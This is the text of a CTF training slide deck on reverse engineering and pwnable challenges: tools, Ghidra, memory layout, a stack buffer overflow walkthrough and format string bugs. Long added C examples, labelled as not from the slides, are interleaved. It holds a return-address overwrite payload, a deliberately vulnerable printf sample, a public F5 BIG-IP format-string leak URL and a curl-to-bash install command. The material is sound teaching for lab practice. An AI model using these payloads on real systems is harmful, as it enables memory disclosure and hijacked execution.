Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx

nkrafacyberclub 143 views 84 slides Jun 01, 2024

About This Presentation

coc2024


Slide Content

Reverse Engineering & Pwnable for CTF. Powered by: Kusol Watchara-Apanukorn

WHO AM I?
Kusol Watchara-Apanukorn (Boss)
Head of Cyber Security Consultant @ Sectrike Co., Ltd
Certificates: OSCP, GPEN, eCXD, Python for Pentester
Hobbies: IoT CVE Hunter, Bug Bounty Hunter, CTF
LinkedIn Profile: https://th.linkedin.com/in/kusol-watchara-apanukorn-808094146

TABLE OF CONTENTS
01 Introduction (Basic Knowledge)
02 Basic of RE (Reverse Engineering)
03 Basic of PWN (Pwnable)
04 Summary

Introduction

Reverse Engineering: Definition
"Reverse engineering is considered as the process of developing a set of specifications for a complex hardware system by an orderly examination of specimens of that system. It is assumed that the specifications are being developed for the purpose of making a clone of the original hardware system, a circumstance which requires the most comprehensive form of specifications."
Ref: https://ieeexplore.ieee.org/abstract/document/6313354

Reverse Engineering: Basic Knowledge for CTF
- Read pseudo-code
- Know some assembly
- Coding

Reverse Engineering: Common languages in CTF
- C
- C++
- Rust
- Golang
- C# or .NET
- Java
- Python (pyc or py)

Low-Level Languages
- Manual memory management
- Communicate directly with the hardware/OS
- True low-level: assembly and machine code
- These days, C and C++ are commonly categorized as low-level languages.

Reverse Engineering: Common binary files
- PE file (.exe or .dll)
- ELF file (elf)
- APK file (apk)
- .NET file (.exe)
- Java file
- Python file (pyc or py)

Reverse Engineering: Common goals
- Search for hardcoded values
- Modify the target program to change its logic
- Analyze how the program works (this sits between reverse engineering and pwnable)
- Find hidden functions
- Find the valid input that shows the flag

Pwnable, aka Pwned/Pwn
A slang word meaning to totally defeat or dominate. The earliest known use of the verb pwn is in the 1990s; the earliest evidence is from 1999, in a message posted on the Usenet newsgroup rec.games.computer.ultima.online.
Ref: https://www.oed.com/dictionary/pwn_v?tl=true

Pwnable: Basic knowledge
- Reverse engineering
  - Read pseudo-code
  - Know some assembly
- Coding
- Memory vulnerabilities such as buffer overflow and format string

Pwnable: Common binary files
- PE file (.exe or .dll)
- ELF file (elf)
- Python file (pyc or py)

Pwnable: Common CTF goals
- Analyze how the program works (this sits between reverse engineering and pwnable)
- Find hidden functions
- Find the valid input that shows the flag
- Time attack
- Exploit a program with a memory vulnerability, e.g.:
  - Buffer overflow on ARM, x86, x86_64
  - Format string vulnerability
  - Return-oriented programming (ROP)

Reverse Engineering

Reverse Engineering Tools
Disassemblers:
- Ghidra [Free]
- IDA [Free/Paid]
- Hopper [Paid]
- Radare2 [Free]
Decompilers (for Java and .NET):
- JADX
- JD-GUI
- dnSpy
- ILSpy
- decompiler.com

Reverse Engineering Tools: Tricks
- Whenever you get a file, run the file command on it first to learn what kind of file it really is.
- Use strings <filename> to read the strings in the binary and look for clues; grep -i helps to filter them.
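As an added example (not part of the slides), the two tricks above written out in C: a magic-byte check in the spirit of the file command for the binary types listed earlier, and a minimal strings extractor. Both run over a constructed byte sequence that is not a real binary; the labels and the 4-byte minimum run length are my choices.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Identify a file by its leading magic bytes, as `file` does for the
 * common CTF formats: ELF, PE (.exe/.dll, "MZ"), ZIP containers (APK, JAR)
 * and Java class files. Anything else is reported as unknown. */
const char *identify_magic(const unsigned char *buf, size_t n)
{
    if (n >= 4 && memcmp(buf, "\x7f" "ELF", 4) == 0)        return "ELF";
    if (n >= 2 && memcmp(buf, "MZ", 2) == 0)                return "PE (MZ header)";
    if (n >= 4 && memcmp(buf, "PK\x03\x04", 4) == 0)        return "ZIP container (APK/JAR)";
    if (n >= 4 && memcmp(buf, "\xca\xfe\xba\xbe", 4) == 0)  return "Java class";
    return "unknown";
}

/* Minimal `strings`: every run of at least minlen printable bytes is
 * appended to out, one per line. Returns the number of runs found, even
 * when out is too small to hold them all. */
size_t extract_strings(const unsigned char *buf, size_t n, size_t minlen,
                       char *out, size_t outsz)
{
    size_t count = 0, used = 0, run_start = 0;
    for (size_t i = 0; i <= n; i++) {
        if (i < n && isprint(buf[i])) continue;     /* still inside a run */
        size_t len = i - run_start;                 /* run is buf[run_start, i) */
        if (len >= minlen) {
            count++;
            if (used + len + 1 < outsz) {
                memcpy(out + used, buf + run_start, len);
                used += len;
                out[used++] = '\n';
            }
        }
        run_start = i + 1;
    }
    if (outsz) out[used] = '\0';
    return count;
}

/* Constructed sample, not a real binary: ELF magic, a few non-printable
 * bytes, two readable strings and one run ("ab") too short to report. */
static const unsigned char SAMPLE[] =
    "\x7f" "ELF" "\x02\x01\x01\x00\x00\x00"
    "Hello, CTF!" "\x00\x01\x02"
    "ab" "\x00"
    "/lib64/ld-linux-x86-64.so.2" "\x00"
    "\xff\xfe";
static const size_t SAMPLE_LEN = sizeof SAMPLE - 1;   /* drop the literal's own NUL */

/* Number of strings (>= 4 printable bytes) found in SAMPLE. */
size_t sample_string_count(void)
{
    char out[256];
    return extract_strings(SAMPLE, SAMPLE_LEN, 4, out, sizeof out);
}

int main(void)
{
    char out[256];
    printf("type: %s\n", identify_magic(SAMPLE, SAMPLE_LEN));
    size_t n = extract_strings(SAMPLE, SAMPLE_LEN, 4, out, sizeof out);
    printf("%zu strings:\n%s", n, out);
    return 0;
}
```

On the sample this reports the type as ELF and two strings: the greeting and the loader path, while the 3-byte "ELF" and the 2-byte "ab" runs fall below the minimum length, which is the same trade-off strings makes with its -n option.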

Root-Me Challenge

Ghidra Basic Usage: Download here: https://github.com/NationalSecurityAgency/ghidra/releases

Ghidra (Java Issue)
Windows: https://oracle.com/java/technologies/downloads/#jdk22-windows
Linux:
    $ sudo apt update
    $ sudo apt install default-jdk

Ghidra Basic Usage
1. Execute the bash file.
2. Create a new project.
3. Choose any project type and click the Next button.
4. Choose the project directory and name the project. When done, click "Finish".
5. Import the lab's file using the "Import File..." function.
6. Click OK.
7. Click OK.
8. Double-click on the lab's file.
9. Click Yes to analyze the binary file.
10. Use the default settings and click Analyze.
11. Analyze the main function.
12. Analyze the pseudo-code.
13. __s1 must be "123456789" to enter the iVar1 == 0 condition.

Reverse Engineering Lab
Please solve this challenge from root-me.org: ELF x86 - Basic (20 minutes)

Pwnable

Pwnable Tools
Windows debuggers:
- WinDbg
- Immunity Debugger
Linux debuggers:
- GDB
- GDB-GEF
- GDB-PEDA
Exploit tools:
- pwntools (Python library)
- Ropper
- ROPGadget

Pwnable Tools: Tricks
- Run checksec to check the security properties of the executable.
- You need to be strong in assembly language, computer architecture, C programming (reverse engineering) and Python to write the scripts for these challenges!

x86-64 Linux Memory Layout
- Stack: manages local variables, function arguments, and control information such as the return address
- Heap: dynamic memory allocation (malloc(), calloc(), new)
- Data: statically allocated data such as global variables, static variables, string constants
- Text / Shared Libraries: executable machine instructions, read-only
Diagram (top to bottom): Stack, Shared Libraries, Heap, Data, Text; address labels 0x00007FFFFFFFFFFF and 0x0000040000000000.
Ref: https://slideplayer.com/slide/14508799/

Memory Allocation Example Ref: https://slideplayer.com/slide/14508799/

Memory Allocation Example (addresses observed)
    local        0x00007ffe4d3be87c   Stack
    p1           0x00007f7262a1e010   Heap (0x00007F... region)
    p3           0x00007f7162a1d010   Heap (0x00007F... region)
    p4           0x000000008359d120   Heap
    p2           0x000000008359d010   Heap
    big_array    0x0000000080601060   Data
    huge_array   0x0000000000601060   Data
    main()       0x000000000040060c   Text
    useless()    0x0000000000400590   Text
Ref: https://slideplayer.com/slide/14508799/
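To reproduce the table above on your own machine, here is an added C probe (not from the slides or the referenced deck) that takes one address from each region and checks that they are ordered as the diagram shows. The names big_array and useless are borrowed from the slide; the exact addresses printed will differ on every run because of ASLR, but the ordering Text < Data < Heap < Stack is what the layout predicts on Linux x86-64.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>

/* Statically allocated data, like the slide's big_array: lives in the Data
 * region (.bss here) between Text and the heap. */
static char big_array[1 << 20];

/* A function whose address stands in for the Text region (like useless()). */
static void useless(void) { }

typedef struct {
    uintptr_t text;        /* address of a function */
    uintptr_t data;        /* address of a global array */
    uintptr_t heap_small;  /* small malloc(): served from the brk heap */
    uintptr_t heap_large;  /* large malloc(): glibc serves it from an mmap region */
    uintptr_t stack;       /* address of a local variable */
} layout_t;

/* Collect one address from each region of the running process. Only the
 * numeric values are kept, so freeing the blocks afterwards is fine. */
layout_t probe_layout(void)
{
    int local = 0;
    void *p_small = malloc(64);
    void *p_large = malloc(1 << 20);   /* above glibc's default mmap threshold */
    layout_t l;
    l.text       = (uintptr_t)useless;
    l.data       = (uintptr_t)big_array;
    l.heap_small = (uintptr_t)p_small;
    l.heap_large = (uintptr_t)p_large;
    l.stack      = (uintptr_t)&local;
    free(p_small);
    free(p_large);
    return l;
}

/* 1 if the addresses are ordered as in the diagram: Text < Data < Heap < Stack.
 * The large block is allowed to be missing (malloc failure) but, when present,
 * must also sit between Data and Stack. */
int layout_matches_diagram(const layout_t *l)
{
    return l->text < l->data && l->data < l->heap_small && l->heap_small < l->stack
        && (l->heap_large == 0 || (l->data < l->heap_large && l->heap_large < l->stack));
}

int main(void)
{
    layout_t l = probe_layout();
    printf("%-12s 0x%016" PRIxPTR "   Stack\n", "local",      l.stack);
    printf("%-12s 0x%016" PRIxPTR "   Heap (large)\n", "p_large", l.heap_large);
    printf("%-12s 0x%016" PRIxPTR "   Heap (small)\n", "p_small", l.heap_small);
    printf("%-12s 0x%016" PRIxPTR "   Data\n", "big_array",  l.data);
    printf("%-12s 0x%016" PRIxPTR "   Text\n", "useless()",  l.text);
    puts(layout_matches_diagram(&l) ? "ordered as Text < Data < Heap < Stack"
                                    : "unexpected order (sanitizer or unusual loader?)");
    return 0;
}
```

The small and large allocations land in different places for the same reason p1/p3 and p2/p4 differ in the slide: requests above the mmap threshold get their own mapping near the shared libraries instead of extending the brk heap.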

Sample Memory Safety Vulnerabilities
- Stack-based buffer overflow
- Heap-based buffer overflow
- Format string vulnerability
- Use after free
- ...
Ref: https://cwe.mitre.org/data/definitions/119.html

Install Debugger Plugin
Install GEF (Linux): https://github.com/hugsy/gef
Install:
    bash -c "$(curl -fsSL https://gef.blah.cat/sh)"

Buffer Overflow: Vulnerable Buffer Code

Buffer Overflow Disassembly

What happened? (Stack frame diagram for call_echo: Return Address (8 bytes), Unused, then buf[10] indexed [9] down to [0])

Buffer Stack (same stack-frame diagram for call_echo: Return Address (8 bytes), Unused, buf[10])

Buffer Overflow Stack (same stack-frame diagram, after the overflow)

Return address of echo(): 0x00000000004011c8

Analyze before return: breakpoint at 0x4011c8 (return)

Analyze before return: run the program

Control Pointer

Analyze before return: analyze RBP

Analyze before return: overwrite RBP

We have overflowed the buffer into RBP. What is the state right now? (Diagram: Buf[10], then the saved RBP (8 bytes), then the saved RIP / return address (8 bytes).)
Next steps:
- How do we replace RIP?
- Which address do we want to return to?
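The code behind these slides is only shown as screenshots, so here is an added C example (my reconstruction of the pattern, not the slide's own program) that puts the 10-byte buffer from the diagram beside two bounded forms a defender would write instead. The 18-byte filler line used in the demo matches the buf[10] + saved RBP (8 bytes) layout above; the stream is constructed in memory with fmemopen, a POSIX call, so nothing is read from a terminal.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen(), used only in the demo */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_LEN 10   /* same size as the slide's buf[10] */

/* The slide's pattern: untrusted input copied into a 10-byte stack buffer
 * with no length check. With 18 or more input bytes the copy runs past buf,
 * through the saved RBP and onto the return address shown in the diagram.
 * Kept for comparison only; nothing here calls it. */
void echo_unbounded(const char *input)
{
    char buf[BUF_LEN];
    strcpy(buf, input);            /* writes strlen(input)+1 bytes regardless of BUF_LEN */
    puts(buf);
}

/* Hardened copy: the input must fit in the buffer including its terminator,
 * otherwise it is refused and nothing is written past out.
 * Returns 0 on success, -1 when the input was rejected. */
int echo_bounded(const char *input, size_t input_len, char out[BUF_LEN])
{
    if (input_len >= BUF_LEN) {
        out[0] = '\0';
        return -1;                 /* caller decides how to report the oversize input */
    }
    memcpy(out, input, input_len);
    out[input_len] = '\0';
    return 0;
}

/* Hardened line reader for the stdin case: fgets() never writes more than
 * bufsz bytes, and the rest of an over-long line is drained so it cannot be
 * mistaken for the next input. Returns 0 if the line fit, -1 if it was
 * longer than the buffer, EOF at end of input. */
int read_line_bounded(FILE *in, char *buf, size_t bufsz)
{
    if (fgets(buf, (int)bufsz, in) == NULL) return EOF;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    int c, overflowed = 0;
    while ((c = fgetc(in)) != EOF && c != '\n') overflowed = 1;
    return overflowed ? -1 : 0;
}

/* Constructed input: an 18-byte filler line followed by a second line.
 * Returns the reader's verdict for the first line; the second line is
 * stored in `second` to show that the drained bytes did not leak into it. */
int demo_overlong_line(char first[BUF_LEN], char second[BUF_LEN])
{
    char line[] = "AAAAAAAAA" "AAAAAAAAA" "\nnext\n";   /* 9 + 9 = 18 A's */
    FILE *f = fmemopen(line, sizeof line - 1, "r");
    if (!f) return EOF;
    int rc = read_line_bounded(f, first, BUF_LEN);
    read_line_bounded(f, second, BUF_LEN);
    fclose(f);
    return rc;
}

int main(void)
{
    char out[BUF_LEN], first[BUF_LEN], second[BUF_LEN];
    int rc = echo_bounded("hello", 5, out);
    printf("echo_bounded(\"hello\")    -> %d (%s)\n", rc, out);
    printf("echo_bounded(18 x 'A')   -> %d\n", echo_bounded("AAAAAAAAAAAAAAAAAA", 18, out));
    rc = demo_overlong_line(first, second);
    printf("over-long line: rc=%d kept=\"%s\" next=\"%s\"\n", rc, first, second);
    return 0;
}
```

The bounded reader keeps the first 9 bytes, reports that the line was too long, and the following line still arrives intact; the rejection return value is what the slides' RBP/RIP diagram never gets, since the unbounded copy has no way to say no.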

Control Pointer: overwrite RIP (exit and get into gdb again first)

Unused function: nobody calls it. Can we call it?

Unused function (disassembly): 0x00000000004011da

Little Endian vs Big Endian
Data: 0x01020304
- Little endian (bytes as stored in memory): 04 03 02 01
- Big endian: 01 02 03 04

How to check byte order (Linux): lscpu | grep Endian

Return to smash() function
0x4011da -> \xda\x11\x40 (little-endian byte order). The 18 filler bytes cover buf[10] and the saved RBP (8 bytes) from the stack diagram, so the bytes after them land on the return address.
    run <<< $(python -c "print 'A'*18+'\xda\x11\x40'")
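Byte order is the step people most often get wrong when reading memory dumps, so here is an added C example (not from the slides) that makes the two slides above executable: a host-order probe that replaces lscpu | grep Endian, portable conversion of a 32-bit value to little- and big-endian byte sequences, and a helper that prints bytes as the \xHH escapes used on the slide. The values 0x01020304 and 0x4011da are the slide's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 1 if this host stores the least significant byte at the lowest address. */
int host_is_little_endian(void)
{
    uint32_t probe = 0x01020304u;
    uint8_t first_byte;
    memcpy(&first_byte, &probe, 1);      /* the byte at the lowest address */
    return first_byte == 0x04;
}

/* Serialise v least-significant byte first (little endian), independent of
 * the host's own byte order. */
void u32_to_le(uint32_t v, uint8_t out[4])
{
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* Serialise v most-significant byte first (big endian / network order). */
void u32_to_be(uint32_t v, uint8_t out[4])
{
    for (int i = 0; i < 4; i++) out[3 - i] = (uint8_t)(v >> (8 * i));
}

/* Inverse of u32_to_le: rebuild the value from little-endian bytes. */
uint32_t le_to_u32(const uint8_t in[4])
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)in[i] << (8 * i);
    return v;
}

/* Render bytes as the \xHH escapes the slide uses. out needs 4*n+1 bytes. */
void bytes_to_escapes(const uint8_t *b, size_t n, char *out, size_t outsz)
{
    size_t used = 0;
    if (outsz) out[0] = '\0';
    for (size_t i = 0; i < n && used + 5 <= outsz; i++)
        used += (size_t)snprintf(out + used, outsz - used, "\\x%02x", b[i]);
}

int main(void)
{
    uint8_t le[4], be[4];
    char esc[4 * 4 + 1];
    u32_to_le(0x01020304u, le);
    u32_to_be(0x01020304u, be);
    printf("host: %s endian\n", host_is_little_endian() ? "little" : "big");
    printf("0x01020304 little endian: %02x %02x %02x %02x\n", le[0], le[1], le[2], le[3]);
    printf("0x01020304 big endian:    %02x %02x %02x %02x\n", be[0], be[1], be[2], be[3]);
    /* The slide's address 0x4011da as stored in memory: the slide shows three
     * bytes, the fourth (and, on x86-64, bytes five to eight) are 0x00. */
    u32_to_le(0x4011dau, le);
    bytes_to_escapes(le, 4, esc, sizeof esc);
    printf("0x4011da in memory: %s\n", esc);
    return 0;
}
```

Writing the conversions with shifts rather than pointer casts is what makes them correct on both byte orders; the slide's lscpu check only tells you what the machine you are sitting at does.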

Pwnable Lab
Please solve this challenge from root-me.org (45 minutes)

Format String Vulnerability

Format Function
The format function is an ANSI C conversion function, e.g. printf, fprintf. It converts a primitive variable of the programming language into a human-readable string representation.

Format String
The format string is the argument of the format function: an ASCIIZ string that contains text and format parameters. Example: printf("The magic number is: %d\n", 1911);
The format string parameters, like %x or %s, define the type of conversion performed by the format function.

Vulnerable Code (No input validation)

    #include <stdio.h>

    int main(int argc, char **argv)
    {
        if (argc < 2)
            return 1;                 /* nothing to print */
        // This line is safe: argv[1] is passed as data for %s
        printf("%s\n", argv[1]);
        // This line is vulnerable: argv[1] itself becomes the format string
        printf(argv[1]);
        return 0;
    }

Normal Situation

Memory Leaked

Denial of Service

Common parameters used in a Format String Attack

Real Life?

Reverse Engineering

Public Vulnerability

Public Vulnerability
Payload:
    https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x
Log Result:
    Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile: 0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000

Format String Summary
- Secure coding perspective: developers need to understand the functions they use.
- Web Application Firewall (WAF): you can block specific patterns like %s, %x, %p, ...
- Attack analysis: you can look for common attack parameters like %s, %x, %p, ...
- Pentester: you know one more technique :D

False Positive (URL Encoding)
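To make the WAF and attack-analysis points, and the URL-encoding false positive, concrete, here is an added C example (not from the slides): a scanner that counts printf directives the way the format function itself parses them, plus a percent-decoder, so the same input can be judged raw and after decoding. The query string from the public example above is used as one input; the other samples are constructed, including a UTF-8 name percent-encoded in lowercase hex.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Parse one printf-style conversion beginning at s (s[0] == '%'): flags,
 * width, precision, length modifier, conversion character. Returns the
 * number of characters it spans, or 0 if no well-formed conversion starts
 * here ("%25 done", a trailing '%', ...). */
static size_t parse_conversion(const char *s, char *conv_out)
{
    const char *p = s + 1;
    while (*p && strchr("-+ #0", *p)) p++;                 /* flags */
    while (isdigit((unsigned char)*p)) p++;                /* width */
    if (*p == '*') p++;
    if (*p == '.') {                                       /* precision */
        p++;
        while (isdigit((unsigned char)*p)) p++;
        if (*p == '*') p++;
    }
    while (*p && strchr("hlLqjzt", *p)) p++;               /* length modifiers */
    if (*p && strchr("diouxXeEfFgGaAcspn", *p)) {
        if (conv_out) *conv_out = *p;
        return (size_t)(p - s) + 1;
    }
    return 0;
}

typedef struct {
    int total;   /* well-formed conversions found */
    int reads;   /* %s %p %x %X: the leak conversions named on the slides */
    int writes;  /* %n: the only conversion that writes to memory */
} directive_stats;

/* Count directives exactly as a format function would see them, so "%%" and
 * "%25" do not count while "%08x" and "%n" do. */
directive_stats scan_directives(const char *s)
{
    directive_stats st = {0, 0, 0};
    for (size_t i = 0; s[i]; ) {
        if (s[i] != '%') { i++; continue; }
        if (s[i + 1] == '%') { i += 2; continue; }          /* literal percent */
        char conv = 0;
        size_t len = parse_conversion(s + i, &conv);
        if (len == 0) { i++; continue; }
        st.total++;
        if (conv == 'n') st.writes++;
        else if (strchr("spxX", conv)) st.reads++;
        i += len;
    }
    return st;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode a URL component ("%HH" -> byte, '+' -> space); malformed
 * escapes are copied through unchanged. Returns the decoded length.
 * Caveat: "%00" yields a NUL that ends the decoded string for the scanner. */
size_t url_decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < outsz; i++) {
        int hi, lo;
        if (in[i] == '%' && (hi = hexval(in[i + 1])) >= 0 && (lo = hexval(in[i + 2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = in[i] == '+' ? ' ' : in[i];
        }
    }
    if (outsz) out[o] = '\0';
    return o;
}

/* Directive count after URL decoding: what a decoding backend would see. */
int directives_after_decoding(const char *raw)
{
    char buf[512];
    url_decode(raw, buf, sizeof buf);
    return scan_directives(buf).total;
}

/* Query string from the slide's public example, as logged before decoding. */
static const char SLIDE_PAYLOAD[] =
    "WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x";
/* Constructed benign input: a UTF-8 name percent-encoded in lowercase hex. */
static const char BENIGN_UTF8[] = "name=%d0%9f%d1%80";

int main(void)
{
    const char *samples[] = { SLIDE_PAYLOAD, BENIGN_UTF8, "progress: 100%25 done", "%n%n" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        directive_stats raw = scan_directives(samples[i]);
        printf("%-66s raw: %d (reads %d, writes %d)  decoded: %d\n", samples[i],
               raw.total, raw.reads, raw.writes, directives_after_decoding(samples[i]));
    }
    return 0;
}
```

Three things fall out of running it. The slide's payload scores 8 read directives on the raw string even though a naive substring rule for "%x" never matches "%08x". The lowercase-encoded UTF-8 name scores 3 raw directives ("%d", "%9f", "%d") but 0 after decoding, which is exactly the false positive the slide title refers to. And "%08" is itself a valid percent escape, so decoding the payload first erases its directives: the scanner has to run on the representation the backend actually hands to the format function, which in the logged example was the undecoded one. Even "100% done" becomes a directive ("% d") once "%25" is decoded, which is the secure-coding point from the summary in one line.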

Pwnable Lab
Please solve this challenge from root-me.org

Summary

Learning Resources
- https://ctf101.org [Basic to intermediate]
- http://pwnable.kr/ [Basic to advanced]
- https://www.youtube.com/@LiveOverflow [Basic to expert]
- https://guyinatuxedo.github.io/ [Basic to expert]
- https://exploit.education/ [Basic to expert]

Final Thing
A tool is just a tool!!! A tool can help you only when you have the knowledge. To solve reverse engineering/pwnable CTF challenges you need to learn a lot. Self-learning is the key!!!!

Thank You. Any questions?